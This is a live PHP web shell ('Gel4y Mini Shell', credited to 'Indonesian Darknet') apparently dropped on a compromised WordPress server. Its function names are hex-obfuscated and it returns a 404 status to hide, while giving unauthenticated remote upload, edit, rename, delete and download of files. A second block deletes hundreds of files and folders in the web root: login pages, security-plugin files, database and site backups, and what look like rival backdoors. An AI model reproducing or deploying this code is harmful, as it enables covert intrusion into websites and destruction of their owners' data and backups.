File: /home/petsclubcc/egyptionpharaoh/157.php
<?php
echo "<span id='anjing' style='display:none;'>".dirname(__FILE__)."</span>";
echo "<span id='bangsat' style='display:none;'>".$_SERVER["SCRIPT_NAME"]."</span>";
?>
<?php error_reporting(0); http_response_code(404); define("self", "G\x65l\64y M\x69n\x69 Sh\x65ll"); $scD = "s\x63\x61\x6e\x64\x69r"; $func = array("7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65"); for ($i = 0; $i < count($func); $i++) { $func[$i] = nhx($func[$i]); } if (isset($_GET["p"])) { $p = nhx($_GET["p"]); $func[3](nhx($_GET["p"])); } else { $p = $func[2](); } function hex($str) { $r = ""; for ($i = 0; $i < strlen($str); $i++) { $r .= dechex(ord($str[$i])); } return $r; } function nhx($str) { $r = ""; $len = (strlen($str) -1); for ($i = 0; $i < $len; $i += 2) { $r .= chr(hexdec($str[$i].$str[$i+1])); } return $r; } function perms($f) { $p = fileperms($f); if (($p & 0xC000) == 0xC000) { $i = 's'; } elseif (($p & 0xA000) == 0xA000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x') : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x') : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x') : (($p & 0x0200) ? 'T' : '-')); return $i; } function a($msg, $sts = 1, $loc = "") { global $p; $status = (($sts == 1) ? "success" : "error"); echo "<script>swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})</script>"; } function deldir($d) { global $func; if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return; if ($func[6]($d)) { array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT)); rmdir($d); } else { unlink($d); } } ?> <!doctype html> <!-- RandsX aka T1kus_g0t --> <html lang="en"> <head> <meta name="theme-color" content="red"> <meta name="viewport" content="width=device-width, initial-scale=0.60, shrink-to-fit=no"> <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css"> <link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"> <title><?= self ?></title> <style>.table-hover tbody tr:hover td{background:red}.table-hover tbody tr:hover td>*{color:#fff}.table>tbody>tr>*{color:#fff;vertical-align:middle}.form-control{background:0 0!important;color:#fff!important;border-radius:0}.form-control::placeholder{color:#fff;opacity:1}li{font-size:18px;margin-left:6px;list-style:none}a{color:#fff}</style> <script src="//unpkg.com/sweetalert/dist/sweetalert.min.js"></script> </head> <body style="background-color:#000;color:#fff;font-family:serif;"> <div class="bg-dark table-responsive text-light border"> <div class="d-flex justify-content-between p-1"> <div><h3 class="mt-2"><a href="?"><?= self ?></a></h3></div> <div> <span>PHP Version : <?= $func[1]() ?></span> <br> <a href="?p=<?= hex($p)."&a=".hex("newFile") ?>">+File</a> <a href="?p=<?= hex($p)."&a=".hex("newDir") ?>">+Directory</a> </div> </div> <div class="border-top table-responsive"> <li>Server : <?= "{$_SERVER["SERVER_NAME"]} ({$_SERVER["SERVER_ADDR"]}/{$_SERVER["REMOTE_ADDR"]})" ?></li> </div> <form method="post" enctype="multipart/form-data"><div class="input-group mb-1 px-1 mt-1"><div class="custom-file"><input type="file" name="f[]" class="custom-file-input" onchange="this.form.submit()" multiple><label class="custom-file-label rounded-0 bg-transparent text-light">Choose file</label></div></div></form> <?php if (isset($_FILES["f"])) { $n = $_FILES["f"]["name"]; for ($i = 0; $i < count($n); $i++) { if ($func[11]($_FILES["f"]["tmp_name"][$i], $n[$i])) { a("file uploaded successfully"); } else { a("file failed to upload", 0); } } } if (isset($_GET["download"])) { header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-Length: ".$func[17](nhx($_GET["n"]))); header("Content-disposition: attachment; filename=\"".nhx($_GET["n"])."\""); } ?> </div> <div class="bg-dark border table-responsive-sm mt-2"> <div class="ml-2" style="font-size:18px;"> <span>Path: </span> <?php $ps = $func[4]("/(\\\|\/)/", $p); foreach ($ps as $k => $v) { if ($k == 0 && $v == "") { echo "<a href=\"?p=2f\">~</a>/"; continue; } if ($v == "") continue; echo "<a href=\"?p="; for ($i = 0; $i <= $k; $i++) { echo hex($ps[$i]); if ($i != $k) echo "2f"; } echo "\">{$v}</a>/"; } ?> </div> </div> <article class="bg-dark border table-responsive-sm mt-2"> <?php if (!isset($_GET["a"])): ?> <table class="table table-hover table-bordered table-sm"> <thead class="text-light"> <tr> <th>Name</th> <th>Size</th> <th>Permission</th> <th>Action</th> </tr> </thead> <tbody class="text-light"> <?php $scD = $func[5]($scD($p), [".", ".."]); foreach ($scD as $d) { if (!$func[6]("$p/$d")) continue; echo " <tr> <td><a href=\"?p=".hex("$p/$d")."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$func[19]("Y-m-d H:i", $func[20]("$p/$d"))."\"><i class=\"fa fa-fw fa-folder\"></i> {$d}</a></td> <td>N/A</td> <td><font color=\"".(($func[8]("$p/$d")) ? "#00ff00" : (!$func[9]("$p/$d") ? "red" : null))."\">".perms("$p/$d")."</font></td> <td> <a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($d)."&t=d\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a> <a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($d)."\" class=\"delete\" data-type=\"folder\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a> </td> </tr>"; } foreach ($scD as $f) { if (!$func[7]("$p/$f")) continue; $size = $func[10]("$p/$f")/1024; $size = round($size, 3); $size = ($size > 1024) ? round($size/1024, 2)."MB" : $size."KB"; echo " <tr> <td><a href=\"?p=".hex($p)."&a=".hex("view")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Latest modify on ".$func[19]("Y-m-d H:i", $func[20]("$p/$f"))."\"><i class=\"fa fa-fw fa-file\"></i> {$f}</a></td> <td>{$size}</td> <td><font color=\"".(($func[8]("$p/$f")) ? "#00ff00" : (!$func[9]("$p/$f") ? "red" : null))."\">".perms("$p/$f")."</font></td> <td> <div class=\"d-flex justify-content-between\"> <a href=\"?p=".hex($p)."&a=".hex("edit")."&n=".hex($f)."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Edit\"><i class=\"fa fa-fw fa-edit\"></i></a> <a href=\"?p=".hex($p)."&a=".hex("rename")."&n=".hex($f)."&t=f\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Rename\"><i class=\"fa fa-fw fa-pencil\"></i></a> <a href=\"?p=".hex($p)."&n=".hex($f)."&download"."\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Download\"><i class=\"fa fa-fw fa-download\"></i></a> <a href=\"?p=".hex($p)."&a=".hex("delete")."&n=".hex($f)."\" class=\"delete\" data-type=\"file\" data-toggle=\"tooltip\" data-placement=\"auto\" title=\"Delete\"><i class=\"fa fa-fw fa-trash\"></i></a> </div> </td> </tr> "; } ?> </tbody> </table> <?php else :if (isset($_GET["a"])) $a = nhx($_GET["a"]); ?> <div class="px-2 py-2"> <?php if ($a == "delete") { $loc = $p.'/'.nhx($_GET["n"]); if ($_GET["t"] == "d") { deldir($loc); if (!$func[12]($loc)) { a("folder deleted successfully"); } else { a("failed to delete the folder", 0); } } if ($_GET["t"] == "f") { $loc = $p.'/'.nhx($_GET["n"]); unlink($loc); if (!$func[12]($loc)) { a("file deleted successfully"); } else { a("file to delete the folder", 0); } } } ?> <?php if ($a == "newDir"): ?> <h5 class="border p-1 mb-3">New folder</h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input name="n" id="n" class="form-control" autocomplete="off"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($func[12]("$p/{$_POST["n"]}") ? a("folder name has been used", 0, "&a=".hex("newDir")) : ($func[15]("$p/{$_POST["n"]}") ? a("folder created successfully") : a("folder failed to create", 0))) : null); elseif ($a == "newFile"): ?> <h5 class="border p-1 mb-3">New file</h5> <form method="post"><div class="form-group"><label for="n">File name :</label><input type="text" name="n" id="n" class="form-control" placeholder="hack.txt"></div><div class="form-group"><label for="ctn">Content :</label><textarea style="resize:none" name="ctn" id="ctn" cols="30" rows="10" class="form-control" placeholder="# Stamped By Me"></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Create</button></div></form> <?php ((isset($_POST["s"])) ? ($func[12]("$p/{$_POST["n"]}") ? a("file name has been used", 0, "&a=".hex("newFile")) : ($func[13]("$p/{$_POST["n"]}", $_POST["ctn"]) ? a("file created successfully",1,"&a=".hex("view")."&n=".hex($_POST["n"])) : a("file failed to create", 0))) : null); elseif ($a == "rename"): ?> <h5 class="border p-1 mb-3">Rename <?= (($_GET["t"] == "d") ? "folder" : "file") ?></h5> <form method="post"><div class="form-group"><label for="n">Name :</label><input type="text" name="n" id="n" class="form-control" value="<?= nhx($_GET["n"]) ?>"></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($func[16]($p.'/'.nhx($_GET["n"]), $_POST["n"]) ? a("successfully changed the folder name") : a("failed to change the folder name", 0)) : null); elseif ($a == "edit"): ?> <h5 class="border p-1 mb-3">Edit file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <form method="post"><div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control"><?= $func[18]($func[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div><div class="form-group"><button type="submit" name="s" class="btn btn-outline-light rounded-0">Save</button></div></form> <?php ((isset($_POST["s"])) ? ($func[13]($p.'/'.nhx($_GET["n"]), $_POST["ctn"]) ? a("file contents changed successfully", 1, "&a=".hex("view")."&n={$_GET["n"]}") : a("file contents failed to change")) : null); elseif ($a == "view"): ?> <h5 class="border p-1 mb-3">View file</h5> <span>File name : <?= nhx($_GET["n"]) ?></span> <div class="form-group"><label for="ctn">Content :</label><textarea name="ctn" id="ctn" cols="30" rows="10" class="form-control" readonly><?= $func[18]($func[14]($p.'/'.nhx($_GET["n"]))) ?></textarea></div> <?php endif; ?> </div> <?php endif; ?> </article> <div class="bg-dark border text-center mt-2"> <small>Copyright © 2021 - Powered By Indonesian Darknet</small> </div> <script src="//code.jquery.com/jquery-3.5.1.slim.min.js"></script> <script src="//cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.bundle.min.js" ></script> <script src="//cdn.jsdelivr.net/npm/bs-custom-file-input/dist/bs-custom-file-input.min.js"></script> <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('E.n();$(\'[2-m="4"]\').4();$(".l").k(j(e){e.g();h 0=$(6).5("2-0");c({b:"a",9:"o i q?",w:"D "+0+" p C B",A:7,z:7,}).y((8)=>{r(8){x 1=$(6).5("3")+"&t="+((0=="v")?"d":"f");u.s.3=1}})});',41,41,'type|buildURL|data|href|tooltip|attr|this|true|willDelete|title|warning|icon|swal||||preventDefault|let|you|function|click|delete|toggle|init|Are|will|sure|if|location||document|folder|text|const|then|dangerMode|buttons|deleted|be|This|bsCustomFileInput'.split('|'),0,{}))</script> </body> </html>
<?php
$os = $_SERVER["DOCUMENT_ROOT"]."/";
$a = unlink($os."wp-login.php");
$b = unlink($os."xmlrpc.php");
$c = unlink($os.".tmb");
$d = unlink($os.".htaccess_old");
$e = unlink($os."sa.php");
$f = unlink($os."wp-update.php");
$g = unlink($os."wp-content/plugins/wp-file-manager/");
$h = unlink($os."cgi-bin");
$i = unlink($os.".well-known");
$k = unlink($os."error_log");
$l = unlink($os."dead.letter");
$m = unlink($os.".litespeed_flag");
$n = unlink($os.".hcflag");
$o = unlink($os.".rnd");
$p = unlink($os."vzh.txt");
$q = unlink($os."wp-aa.php");
$r = unlink($os."404.html");
$s = unlink($os.".user.ini");
$t = unlink($os."502.html");
$u = unlink($os."eae.txt");
$v = unlink($os."ss.php");
$w = unlink($os."jlc.txt");
$x = unlink($os.".htaccess.bk");
$y = unlink($os."bykont.php");
$z = unlink($os.".ftpquota");
$aa = unlink($os.".htaccess.ovh.old");
$ab = unlink($os.".ftp-deploy-sync-state.json");
$ac = unlink($os.".ftpquota");
$ad = unlink($os."wp-content/plugins/educationhub-connector.zip");
$ae = unlink($os."wp-content/plugins/edurp-customizations.zip");
$af = unlink($os.".user.ini.zip");
$ag = unlink($os."php.ini.zip");
$ah = unlink($os."siteguarding_tools.php");
$ai = unlink($os."test-01.html");
$aj = unlink($os."wp-content/Farila_debug.log");
$ak = unlink($os."wp-content/Jibran_debug.log");
$al = unlink($os."wp-content/Naveed_debug.log");
$am = unlink($os."wp-content/debug.log");
$an = unlink($os."wp-content/mu-plugins-live.zip");
$ao = unlink($os."wp-content/stratus-child-live.zip");
$ap = unlink($os."wp-content/upgrade-live.zip");
$aq = unlink($os."wp-content/upgrade-temp-backup-live.zip");
$ar = unlink($os."wp-content/advanced-cache.php");
$as = unlink($os."--.htaccess.backup");
$at = unlink($os.".DS_Store");
$au = unlink($os."gel4y.php");
$av = unlink($os."mlr.php");
$aw = unlink($os."we2.php");
$ax = unlink($os."wp-content/.DS_Store");
$ay = unlink($os."web.config");
$az = unlink($os."web.config.bkup261220240316");
$ba = unlink($os."ipn_main_handler.php");
$bb = unlink($os."xilapay.php");
$bc = unlink($os."object-cache.php");
$bd = unlink($os."itespeed.conf");
$be = unlink($os."wordpress-6.5.5.zip");
$bf = unlink($os."wp-content/autoptimize_404_handler.php");
$bg = unlink($os."wp-content/plugins/buddyboss-theme-child.zip");
$bh = unlink($os."wp-content/plugins/buddyboss-theme.zip");
$bi = unlink($os."wordpress.zip");
$bk = unlink($os."server.txt");
$bl = unlink($os."archiv.zip");
$bm = unlink($os."olvasdel.html");
$bn = unlink($os."licenc.txt");
$bo = unlink($os."wp-content/object-cache.php");
$bp = unlink($os."21_11.zip");
$bq = unlink($os."lenstom.zip");
$br = unlink($os."s.php");
$bs = unlink($os."name.zip");
$bt = unlink($os."filespack.json");
$bu = unlink($os."index-old.php");
$bv = unlink($os."wp-content/maintenance.php");
$bw = unlink($os."wp-logo.png");
$bx = unlink($os.".gitignore");
$by = unlink($os.".well-known.zip");
$bz = unlink($os."wsoq2.php");
$ca = unlink($os."xaydung.zip");
$cb = unlink($os.".maintenance");
$cc = unlink($os.".heroku-wp");
$cd = unlink($os.".php-ini");
$ce = unlink($os.".php-version");
$cf = unlink($os.".gitlab-ci.yml");
$cg = unlink($os."docker-compose.yml");
$ch = unlink($os."Dockerfile");
$ci = unlink($os."wordpress-6.7.1-fa_IR.zip");
$cj = unlink($os."wordpress-6.7.1.zip");
$ck = unlink($os.".htacess");
$cl = unlink($os.".wp-config.php.swp");
$cm = unlink($os.".litespeed_conf.dat");
$cn = unlink($os."custom_debug.log");
$co = unlink($os."functions.sh");
$cp = unlink($os."tuan.txt");
$cq = unlink($os."wp-content/.wp-content.php");
$cr = unlink($os."deleteme.wp01fc31c15aae4ee4968b3e4e31f2713d.php");
$cs = unlink($os."deleteme.wpae5cf84cd85a44bf979bbb3d6096893c.php");
$ct = unlink($os."deleteme.wpb7ceb6596ac44a7180d447139750c4c6.php");
$cu = unlink($os."deleteme.wpd91930bb33474468b37f9c8633fb8be7.php");
$cv = unlink($os.".well-known");
$cw = unlink($os."49757c4f");
$cx = unlink($os.".htaccess.preinstall");
$cz = unlink($os."wp-cli.yml");
$da = unlink($os."index.html.backup.74b292efe29cf0ab2dcabbf95022b033");
$db = unlink($os."index.html.backup");
$dc = unlink($os."whitespacefix.php");
$dd = unlink($os."oanNoMmbbU.txt");
$de = unlink($os."nginx.conf");
$df = unlink($os."backup.sql");
$dg = unlink($os.".wordpress.php");
$dh = unlink($os.".htaccess.backup");
$di = unlink($os."wordpress-db-backup.sql");
$stoexf = unlink($os."wp-content/plugins/custom-logo-url.php");
$ibjxkx = unlink($os."advanced-cache.php-old");
$cepnhx = unlink($os."advanced-cache.php-old-old");
$xojrks = unlink($os."db.php-old");
$nubnmr = unlink($os."db.php-old-old");
$ghrtdt = unlink($os."index.php-old");
$bkvbgn = unlink($os."object-cache.php-old");
$sjlyon = unlink($os."object-cache.php-old-old");
$sjlyoo = unlink($os."shopnodhar_backup.zip");
$sjlyop = unlink($os."copy.php");
$sjlyoq = unlink($os."6-10-1403.zip");
$sjlyor = unlink($os."aios-bootstrap.php");
$sjlyos = unlink($os."malcare-waf.php");
$sjlyot = unlink($os."wp-content/.litespeed_conf.dat");
$sjlyou = unlink($os."wp-content/1.pid");
$sjlyov = unlink($os."ioxi.php");
$sjlyow = unlink($os."ulc6.php");
$sjlyox = unlink($os."byp.php");
$sjlyoz = unlink($os."composer.json");
$sjlypa = unlink($os."wp-cli.phar");
$sjlypb = unlink($os.".ovhconfig");
$sjlypc = unlink($os."ioxi-o.php");
$sjlypd = unlink($os.".hta");
$sjlype = unlink($os."wp.php");
$sjlypf = unlink($os."wp-content/plugins/autoload_classmap.php");
$sjlypg = unlink($os."wp-content/themes/chosen.php");
$sjlyph = unlink($os."OneSignalSDKUpdaterWorker.js");
$sjlypi = unlink($os."employee_details.zip");
$sjlypj = unlink($os."lakkars-shoppy-3.mp4");
$sjlypk = unlink($os."pwa-manifest.json");
$sjlypl = unlink($os."pwa-register-sw.js");
$sjlypm = unlink($os."pwa-sw.js");
$sjlypn = unlink($os."sherly-vlogs.mp4");
$sjlypo = unlink($os."pwa-amp-sw.js");
$sjlypp = unlink($os."wp-content/index.php-old");
$sjlypq = unlink($os."README.md");
$sjlypr = unlink($os."composer.lock");
$sjlyps = unlink($os."section-html.html");
$sjlypt = unlink($os."logo.png");
$sjlypu = unlink($os.".htaccess.wpt-backup");
$sjlypv = unlink($os."BingSiteAuth.xml");
$sjlypw = unlink($os."favicon.ico");
$sjlypx = unlink($os."n-favicon.ico");
$sjlypy = unlink($os."seobilityverify_9206358.html");
$sjlypz = unlink($os."sitemap.xml.gz");
$sjlyqa = unlink($os."wp-config-20241112.php");
$sjlyqb = unlink($os."index.html_");
$sjlyqc = unlink($os."shoyo.php");
$sjlyqd = unlink($os."store.php");
$sjlyqe = unlink($os."local-xdebuginfo.php");
$sjlyqf = unlink($os."wp-content/plugins/duplicator-pro.tar.gz");
$sjlyqg = unlink($os."wp-content/plugins/plugins.tar_clinox.gz");
$sjlyqh = unlink($os."wp-content/themes/clinox.tar.gz");
$sjlyqi = unlink($os."law-ta.zip");
$a1 = rmdir($os."wp-login.php");
$a2 = rmdir($os."xmlrpc.php");
$a3 = rmdir($os.".tmb");
$a4 = rmdir($os.".htaccess_old");
$a5 = rmdir($os."sa.php");
$a6 = rmdir($os."wp-update.php");
$a7 = rmdir($os."wp-content/plugins/wp-file-manager/");
$a8 = rmdir($os."cgi-bin");
$a9 = rmdir($os.".well-known");
$b2 = rmdir($os."error_log");
$b3 = rmdir($os."dead.letter");
$b4 = rmdir($os.".litespeed_flag");
$b5 = rmdir($os.".hcflag");
$b6 = rmdir($os.".rnd");
$b7 = rmdir($os."vzh.txt");
$b8 = rmdir($os."wp-aa.php");
$b9 = rmdir($os."wp-content/plugins/seox");
$c1 = rmdir($os."wp-content/plugins/Uwogh-Segs");
$c2 = rmdir($os."wp-content/plugins/exe");
$c3 = rmdir($os."wp-content/plugins/erinyani");
$c4 = rmdir($os."wp-content/plugins/std");
$c5 = rmdir($os."wp-content/plugins/xisikusu");
$c6 = rmdir($os."wp-content/plugins/aqumug");
$c7 = rmdir($os."wp-content/plugins/wp");
$c8 = rmdir($os."wp-content/plugins/seoo");
$c9 = rmdir($os."wp-content/plugins/plugin");
$d1 = rmdir($os."wp-content/plugins/sphinx");
$d2 = rmdir($os."theme");
$d3 = rmdir($os."wp-content/plugins/l5t9pjky");
$d4 = rmdir($os."wp-content/plugins/Occasio7");
$d5 = rmdir($os."wp-content/plugins/peti");
$d6 = rmdir($os."wp-content/plugins/candu");
$d7 = rmdir($os."wp-content/plugins/canda");
$d8 = rmdir($os."wp-content/plugins/uitny891");
$d9 = rmdir($os."wp-content/plugins/b46d88ba88073915e802b08a4ac35614");
$e1 = rmdir($os."wp-content/plugins/x7");
$e2 = rmdir($os."wp-content/plugins/53n311n3");
$e3 = rmdir($os."wp-content/plugins/null");
$e4 = rmdir($os."wp-content/plugins/ytakkjn");
$e5 = rmdir($os."wp-content/plugins/yokr8x0t");
$e6 = rmdir($os."wp-content/plugins/EasySEO");
$e7 = rmdir($os."wp-content/plugins/Ioxi");
$e8 = rmdir($os."wp-content/plugins/Obmrzxv");
$e9 = rmdir($os."wp-content/plugins/adkvuah");
$f1 = rmdir($os."wp-content/plugins/mtoqxmb");
$f2 = rmdir($os."wp-content/plugins/pp");
$f3 = rmdir($os."wp-content/plugins/eyhrxrs");
$f4 = rmdir($os."wp-content/plugins/seooyanz");
$f5 = rmdir($os."wp-content/plugins/cep20e00");
$f6 = rmdir($os."wp-content/plugins/ynrgmwp");
$f7 = rmdir($os."wp-content/plugins/7af063e7286f6b4a8c77d80cc6a669ec");
$f8 = rmdir($os."wp-content/plugins/bzkocikcde");
$f9 = rmdir($os."wp-content/plugins/ovlkfzyewj");
$g1 = rmdir($os."wp-content/plugins/eriyani");
$g2 = rmdir($os."wp-content/plugins/rar");
$g3 = rmdir($os."wp-content/plugins/rzbaoem");
$g4 = rmdir($os."wp-content/plugins/gherhdz");
$g5 = rmdir($os."wp-content/plugins/rdzcpsq");
$g6 = rmdir($os."wp-content/plugins/turymci");
$g7 = rmdir($os."wp-content/plugins/seobacklink");
$g8 = rmdir($os."wp-content/plugins/cxiehla");
$g9 = rmdir($os."wp-content/plugins/d0s08vwy");
$h1 = rmdir($os."wp-content/plugins/MonarkSeo");
$h2 = rmdir($os."wp-content/plugins/jkvfuypcye");
$h3 = rmdir($os."wp-content/plugins/filester");
$h4 = rmdir($os."wp-content/plugins/pkgckjjpjv");
$h5 = rmdir($os."wp-content/plugins/qnbejcbaui");
$h6 = rmdir($os."wp-content/plugins/tlhhsxx");
$h7 = rmdir($os."wp-content/plugins/jnnanol");
$h8 = rmdir($os."wp-content/plugins/lol");
$h9 = rmdir($os."wp-content/plugins/view-source");
$i1 = rmdir($os."wp-content/plugins/659521b8c3d70b0e2e67224812a072d0");
$i2 = rmdir($os."wp-content/plugins/71f6d81d6848fc0cba57b48c677531e2");
$i3 = rmdir($os."wp-content/plugins/1NRjuJn3nvggU4tEcmUMTiw94EWzCMrBUv");
$i4 = rmdir($os."wp-content/plugins/28592a31ece6380c33ef7f1c5b762ae9");
$i5 = rmdir($os."wp-content/plugins/mepr-i18n");
$i6 = rmdir($os."wp-content/plugins/buddyboss-theme-child.zip");
$i7 = rmdir($os."wp-content/plugins/buddyboss-theme.zip");
$i8 = rmdir($os."__MACOSX");
$i9 = rmdir($os."wp-content/plugins/__MACOSX");
$j1 = rmdir($os."NewFolder");
$j2 = rmdir($os."es");
$j3 = rmdir($os."ss");
$j4 = rmdir($os."conf");
$j5 = rmdir($os."wp-content/plugins/file-manager-advanced");
$j6 = rmdir($os."old");
$j7 = rmdir($os."wp-content/plugins/maintenance");
$j8 = rmdir($os."wp-content/maintenance");
$j9 = rmdir($os.".git");
$k1 = rmdir($os."lost+found");
$k2 = rmdir($os.".devpanel");
$k3 = rmdir($os.".vscode");
$k4 = rmdir($os."backup(1)");
$k5 = rmdir($os."backup");
$k6 = rmdir($os.".litespeed_conf.dat");
$k7 = rmdir($os."custom_debug.log");
$k8 = rmdir($os.".wp-cli");
$k9 = rmdir($os."bb-config.php");
$l1 = rmdir($os."n4r5n156");
$xkxbul = rmdir($os."wp-content/et-cache-old");
$fibdhf = rmdir($os."wp-content/et-cache-old-old");
$dqdvjn = rmdir($os."wp-content/languages-old");
$wnjejs = rmdir($os."wp-content/mu-plugins-old");
$jlotoj = rmdir($os."wp-content/mu-plugins-old-old");
$hpkmct = rmdir($os."wp-content/plugins-old");
$ljvitc = rmdir($os."wp-content/plugins-old-old");
$mdhbdk = rmdir($os."wp-content/themes-old");
$pmodux = rmdir($os."wp-content/themes-old-old");
$lefhfr = rmdir($os."wp-content/themes-old-old-old");
$feffly = rmdir($os."wp-content/upgrade-temp-backup");
$itjvnn = rmdir($os."wp-content/upgrade-temp-backup-old");
$terumo = rmdir($os."wp-content/upgrade-temp-backup-old-old");
$zlfqvs = rmdir($os."wp-content/uploads-old");
$zucapw = rmdir($os."wp-content/uploads-old-old");
$tyhcda = rmdir($os."wp-content/w3tc-config-old");
$yhieii = rmdir($os."wp-content/wpo-cache-old");
$zrqssz = rmdir($os."wp-content/advanced-cache.php-old");
$upoyun = rmdir($os."wp-content/advanced-cache.php-old-old");
$islubp = rmdir($os."wp-content/db.php-old");
$daksfx = rmdir($os."wp-content/db.php-old-old");
$jilvhw = rmdir($os."wp-content/debug.log");
$lsssme = rmdir($os."wp-content/index.php-old");
$mwkdgk = rmdir($os."wp-content/object-cache.php-old");
$ymowby = rmdir($os."wp-content/object-cache.php-old-old");
$ymowbz = rmdir($os."wp-content/plugins/wp-plugin-hostgator");
$ymowaz = rmdir($os."blogs");
$ymowbz = rmdir($os."tmp");
$ymowca = rmdir($os.".thumb");
$ymowcb = rmdir($os."wp-content/plugins/uhydomoxu");
$ymowcc = rmdir($os."wp-content/plugins/hostinger");
$ymowcd = rmdir($os."ALFA_DATA");
$ymowce = rmdir($os."lianjie");
$ymowcf = rmdir($os."wp-content/plugins/fdatszo");
$ymowcg = rmdir($os."wp-content/plugins/uijucnr");
$ymowch = rmdir($os."wp-content/plugins/vgpulzmbbs");
$ymowci = rmdir($os."employee_details");
$ymowcj = rmdir($os."vendor");
$ymowck = rmdir($os."wp-content/plugins/plugins");
$ymowcl = rmdir($os."law-ta");